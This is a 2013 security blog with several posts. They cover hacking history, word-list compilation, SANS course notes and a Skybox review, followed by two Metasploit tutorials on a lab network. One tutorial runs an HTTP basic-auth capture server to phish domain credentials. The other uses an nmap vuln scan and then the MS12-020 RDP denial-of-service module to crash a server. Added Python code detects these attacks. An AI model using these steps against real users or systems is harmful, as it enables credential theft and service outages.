
Thursday, 14 November 2013

When it comes to Security - Nothing is Impossible

In 1995, the movie ‘Hackers’ premiered, and the feedback was unanimous: “Exaggerated! How on earth was that even possible?!”

Almost ten years on, and these ‘exaggerated’ ideas have become a reality. The film features a virus called ‘Da Vinci’ — a remote-controlled virus set to sink a fleet of oil tankers from afar. Exaggerated, right? Well, at this year’s Hack in the Box security conference, we learnt that the possibility of a virus hijacking an airline was not that far off.



An earlier film, ‘War Games’, sees Matthew Broderick playing a small-time hacker whose initial objective was simply to play games, but ends up hacking into the US Government’s mainframe. When challenged by his peers about the complexity of a system he has gained access to, he replies, “Hey, I don’t think any system is totally secure.”






This quote from a 1983 movie is still worryingly relevant in today’s society. Millions are spent on devising complex and diverse security architectures, but with every security advance, there are more determined and more specialised hackers attempting to break into the systems.

In today’s society, it takes a lot more than computer competence to become a hacker. Kevin Mitnick, one of the world’s best-known hackers and, at one time, America’s most wanted computer criminal, used simple social skills to bypass the defences of some of the most highly secured facilities. Mitnick helped coin the term ‘social engineering’: using deception and emotional manipulation to gain access to otherwise impenetrable systems. As Bruce Schneier once said, “Amateurs hack systems. Professionals hack people.”



Electronic communications via email, chat applications, SMS, phone calls, or VoIP can all be broken down into zeros and ones. These days, communication means data, and data can mean information, which then leads to value. Controlling information means controlling the situation. Between 2007 and 2008, Chinese hackers were able to hack and control two US satellites for a total of 11 minutes, intercepting information transmitted between the satellite and NASA. Whoever gained access to the data chose not to do anything with it, but it became a landmark in highlighting issues of cyber security.


The new generation of hackers no longer hack just to disrupt services and infrastructure. They hack to take control of information and data. In the modern age of technology, the data on your flash drive could be one of the most valuable things in your arsenal.

The things that we have now, the systems we are using, the mobile phones we carry are the result of hacks that were done during the computer revolution back in the 70s. The technologies that you and I have at hand are partially the result of those people who broke the law to modify, create and innovate.

The gift of hindsight has allowed us to see the technological pathways that computer hacking has forged. Where once, hacking possibilities were at the hands of film directors and novelists, they now lie in the hands of anyone with imagination.

As industry leaders in communication, it is our job to be aware of the potential risks and pitfalls that hacking can create. By keeping an open mind towards hackers and technological creativity, we can ensure that we are able to foresee and defend against any threat in the digital world. As Einstein once said, “Imagination is sometimes better than knowledge.”


This article was also posted at http://tinyurl.com/m38xj2e

Saturday, 14 September 2013

Compiling Word Lists in Linux

In this post, I will show you how to combine many text documents into one huge word list.

Say you have downloaded many .txt word lists from the internet or a torrent, and you end up with something like this:



Before we perform the compilation, make sure you place all the text files into a single directory and remove any empty folders.

Once done, copy the folder (which contains all the txt files) to a Linux machine.

Apply the following commands (as root):

1) # cd /root/Desktop/Wordlist                               --------> cd into the folder that contains the text files
2) # cat *.txt > /root/Desktop/Biglist.txt                   --------> concatenate all the txt files into one huge list (written outside the folder, so a re-run does not read the list back into itself)
3) # sort -u /root/Desktop/Biglist.txt > /root/Desktop/Biglist2.txt   --------> sort it and remove duplicates (sort -u does the work of sort | uniq in one pass)

Monday, 26 August 2013

SANS 542 - Web Application Penetration Testing: Day 1

SANS 542.1
The Attacker's View of the Web




Location: Bangkok's Crowne Plaza Hotel

Topics covered during Day 1:

> Setting up Samurai WTF
> Web Site Server Architecture
> Understanding the HTTP protocol
> Pentesting Types and Methods
> Components of a Web App pentest
> Reports of findings
> Attack Methodology
> Types of Flaws
> JavaScript

While many of the day 1 lessons covered things I already knew, there was also a lot that I learnt, such as analysing HTTP using Wireshark and Paros Proxy. I also learnt how to decrypt HTTPS communication using Wireshark. Basic JavaScript attacks such as XSS were introduced and will be covered more on the other days, and I'm so looking forward to that! The trainer was from Belgium and had a great command of the English language that could be easily understood. Can't wait for day 2.

Wednesday, 26 June 2013

Skybox - How Skybox (Risk Control) can be used in a Pentest Engagement

So I went for a 3-day Skybox training to learn the fundamental uses of the product, and I kind of liked it. Although Skybox is meant to be used as an 'in-house' product, it can also be used in a pentesting engagement.

Basically, there are five components in Skybox:
1) Firewall Assurance
     - http://www.skyboxsecurity.com/products/firewall-assurance
2) Network Assurance
     - http://www.skyboxsecurity.com/products/network-assurance
3) Risk Control
     - http://www.skyboxsecurity.com/products/risk-control
4) Threat Manager
     - http://www.skyboxsecurity.com/products/threat-manager
5) Change Manager
     - http://www.skyboxsecurity.com/products/changemanager

In this article, I will focus on the Risk Control component and how it can be used within a penetration testing scope. I will use the demo model from my training to illustrate the useful features of Risk Control.

Note: The demo model was provided to me during the training. As it was a brief introduction to Skybox, there was no time for practical lessons on how to create a model from scratch, input information such as vulnerabilities and hosts, and map it out into an architecture.

Once I loaded the model, the first thing I saw was the list of vulnerabilities across the whole organisation's network.



Finding Information

One of the features I liked was finding exactly the information I want. For example, if I want to find how many Critical vulnerabilities there are:




If I want to find a list of hosts with the name "app_0_db":



By default it won't show the Vulnerabilities tab, so we need to customise the window to view it.




Vulnerabilities Analysis

To view the details of a vulnerability, the General tab provides lots of information about it.



It also shows the CVSS score of the vulnerability.


Creating an Attacker

Let's create a virtual hacker/attacker located on the Internet. This attacker will then be used to simulate the attacks later.



After creating the virtual attacker, we analyse the exposure: what are the possible targets of this attacker?





Simulating the Attack

Now that we have analysed the exposure, it's time to explore the attack.



After analysing, we will see the kinds of targets, the description of the attack and the risk level.

To view a simulated attack, choose a target and click 'Attack Explorer'.


From the above simulated attack, we can see how the attack was carried out: the vulnerabilities used, the steps of the attack, the ports used and the hosts that were attacked.

How can this integrate into a Penetration Testing Engagement?

The Risk Control component of Skybox can be used to illustrate attacks and simulate hacking scenarios based on the live environment or on 'what if' scenarios, without touching the actual production environment itself. With this, it is easier for pentesters to then perform a PoC of the attack to confirm that the penetration is possible. This would be useful for client organisations who want an engagement but are very, very afraid that such an engagement could lead to a DoS or service failures.

The Disadvantage

1) While finding information and simulating attacks is fun and cool, one needs to do A LOT of work to obtain the initial config files and scanned host files, model them in Skybox and organise them to produce an output like this:


Only personnel with extensive experience in designing the layout would gain an advantage from using Skybox.



2) While this component is very good and useful, the downside is this: how many clients would actually hand over all their switch, IPS/IDS and firewall configurations to another penetration testing company? Skybox is only useful for a proper security/network architecture analysis when it is fed all the necessary config files. Without them, we can't make full use of Skybox's capabilities.

Thursday, 6 June 2013

METASPLOIT - Stealing Credentials (The Lazy Way)

Just when you think its all harmless and innocent.....


In this example, we are going to show how easy it is to steal credentials through deception. Fire up Metasploit (the first command is run from a root shell, the rest inside msfconsole):
# msfconsole
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > set URIPATH ClickMe
msf auxiliary(http_basic) > exploit

A link will be generated; in this case it is http://192.168.71.169:80/ClickMe. For quick kills, you need to find a way to deliver this link to potential victims.


Once the victim receives the link and enters it in the browser's address bar, a username and password are requested. Typically, unsuspecting victims will enter their domain credentials. For this example, I used the username 'windowsusername' and the password 'domainpassword'.


When the victim clicks Log In, the credentials are being sent to the attacker!


*The test was done with McAfee AV fully updated and Windows Firewall on. :)
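The defender's side of the same trick, as an added example that is not part of the original post: the capture server only works because the browser sends the typed credentials in an `Authorization: Basic` header, base64-encoded, to whatever host served the prompt. A web proxy sees exactly that header, so a log review can flag Basic credentials going to a host that is not an approved internal service, or going over cleartext HTTP at all. The log format (one line of `time client method url status authorization-value`), the trusted host name and the sample lines are all constructed assumptions; adapt the split to your proxy's format. The report keeps only the username, never the password.

```python
"""Added example (not from the original post): spot Basic-auth credentials
leaving the network towards an unexpected host.  The log format, host names
and sample lines are assumptions."""
import base64
from urllib.parse import urlsplit

# Assumption: internal services that legitimately prompt for HTTP Basic auth.
TRUSTED_HOSTS = {"intranet.example.com"}


def parse_basic_auth(header_value):
    """Return (username, password) from an Authorization header value of the
    form 'Basic <base64>', or None if it is not valid Basic auth."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:              # binascii.Error is a ValueError subclass
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def find_credential_leaks(log_lines, trusted_hosts=TRUSTED_HOSTS):
    """Scan proxy log lines of the assumed form
         <time> <client> <method> <url> <status> <authorization-value-or-'-'>
    and report every Basic credential sent over cleartext HTTP or to a host
    outside trusted_hosts.  Only the username is kept, never the password,
    so the report itself cannot become a second leak."""
    findings = []
    for line in log_lines:
        parts = line.split(" ", 5)
        if len(parts) != 6:
            continue                    # malformed line, skip it
        when, client, _method, url, _status, auth = parts
        if auth == "-":
            continue                    # no Authorization header at all
        creds = parse_basic_auth(auth)
        if creds is None:
            continue                    # Bearer, Digest, garbage, ...
        target = urlsplit(url)
        reasons = []
        if target.scheme == "http":
            reasons.append("cleartext-http")
        if target.hostname not in trusted_hosts:
            reasons.append("untrusted-host")
        if reasons:
            findings.append({"time": when, "client": client,
                             "host": target.hostname, "user": creds[0],
                             "reasons": reasons})
    return findings


def _basic(user, password):
    """Build a Basic header value for the constructed sample log below."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample log: the post's capture-server URL plus benign traffic.
SAMPLE_LOG = [
    "2013-06-06T10:12:01Z 10.0.0.5 GET http://192.168.71.169:80/ClickMe 401 -",
    "2013-06-06T10:12:09Z 10.0.0.5 GET http://192.168.71.169:80/ClickMe 200 "
    + _basic("windowsusername", "domainpassword"),
    "2013-06-06T10:15:44Z 10.0.0.7 GET https://intranet.example.com/timesheet 200 "
    + _basic("alice", "correct-horse"),
    "2013-06-06T10:16:02Z 10.0.0.7 GET https://intranet.example.com/api 200 Bearer eyJ-not-basic",
    "2013-06-06T10:17:30Z 10.0.0.9 GET http://192.168.71.169:80/ClickMe 200 Basic !!not-base64!!",
]

if __name__ == "__main__":
    for hit in find_credential_leaks(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} sent Basic credentials for "
              f"'{hit['user']}' to {hit['host']} ({', '.join(hit['reasons'])})")
```

On the sample log only the second line is reported: the credentials for windowsusername went to 192.168.71.169 over plain HTTP, which is both an untrusted host and a cleartext channel. The intranet login over HTTPS, the Bearer token and the malformed header are all ignored.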

Thursday, 30 May 2013

NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!


First, we will pick a target and make sure the host is up. We do this with Nmap's ping scan:
# nmap -sn 192.168.71.156


Once we know the host is up and running, we will use Nmap to look for critical vulnerabilities. We invoke the command:

# nmap --script vuln 192.168.71.156 --reason

With this command, Nmap runs every NSE script in the vuln category against the host. Once the scan has completed, the result lists the vulnerabilities found on the host, and it even provides links to more information about each vulnerability.
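The same scan can be saved as XML with `-oX` and turned into a patch list automatically. The following is an added example, not from the original post: it reads Nmap's XML, keeps only the script results whose state is VULNERABLE (or LIKELY VULNERABLE, the other actionable state the NSE vulns library reports) and groups them per host. The embedded XML is a constructed sample shaped like Nmap's output for the scan above, not a real scan: the script id rdp-vuln-ms12-020 is Nmap's real script name for the MS12-020 check, but the table key, title and reference URL are placeholders.

```python
"""Added example (not from the original post): extract actionable findings
from an `nmap --script vuln -oX report.xml` file.  The XML below is a
constructed sample; keys, titles and URLs in it are placeholders."""
import xml.etree.ElementTree as ET

# States the NSE vulns library reports; only these two mean "act on it".
ACTIONABLE_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


def vulnerable_findings(xml_text):
    """Return one dict per (host, port, script) whose result is actionable."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                    # closed/filtered ports have no script output
            for script in port.iter("script"):
                # Vuln results are tables with a 'state' element; nested tables
                # (refs, ids, dates) have no such element and are skipped.
                for table in script.iter("table"):
                    st = table.find("elem[@key='state']")
                    if st is None or not (st.text or "").startswith(ACTIONABLE_STATES):
                        continue
                    title = table.find("elem[@key='title']")
                    findings.append({
                        "host": ip,
                        "port": f"{port.get('protocol')}/{port.get('portid')}",
                        "script": script.get("id"),
                        "state": st.text.strip(),
                        "title": (title.text or "").strip() if title is not None else "",
                    })
    return findings


def patch_list(findings):
    """Group actionable findings by host for hand-off to the patching team."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], []).append(
            f"{f['port']} {f['script']}: {f['state']}")
    return by_host


# Constructed sample shaped like Nmap's -oX output for the scan in the post.
SAMPLE_SCAN_XML = """
<nmaprun scanner="nmap" args="nmap --script vuln 192.168.71.156 --reason -oX report.xml">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.71.156" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389">
        <state state="open" reason="syn-ack"/>
        <service name="ms-wbt-server"/>
        <script id="rdp-vuln-ms12-020" output="VULNERABLE (constructed sample)">
          <table key="MS12-020-PLACEHOLDER">
            <elem key="title">MS12-020 RDP vulnerability (placeholder title)</elem>
            <elem key="state">VULNERABLE</elem>
            <elem key="risk_factor">High</elem>
            <table key="refs">
              <elem>https://example.invalid/advisory-placeholder</elem>
            </table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-placeholder" output="NOT VULNERABLE">
          <table key="PLACEHOLDER-2">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="135">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

if __name__ == "__main__":
    for host, items in patch_list(vulnerable_findings(SAMPLE_SCAN_XML)).items():
        print(host)
        for item in items:
            print("  " + item)
```

For a real report, replace SAMPLE_SCAN_XML with the contents of the `-oX` file. On the sample, only tcp/3389 on 192.168.71.156 is reported; the NOT VULNERABLE SMB result and the filtered port are dropped.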



Now let's exploit that vulnerability! First we need to check whether a module for it exists in the Metasploit database. On your terminal, run:

# locate ms12_020

The output shows that the module is available in Metasploit.

Alternatively, you can search for it inside msfconsole itself: fire up # msfconsole and then run
msf > search ms12_020


Now that we know the exploit is available, we will now execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf auxiliary(ms12_020_maxchannelids) > run


Once executed, the server will crash! Note that this is a Layer 7 (application-layer) DoS attack, not a code-execution exploit.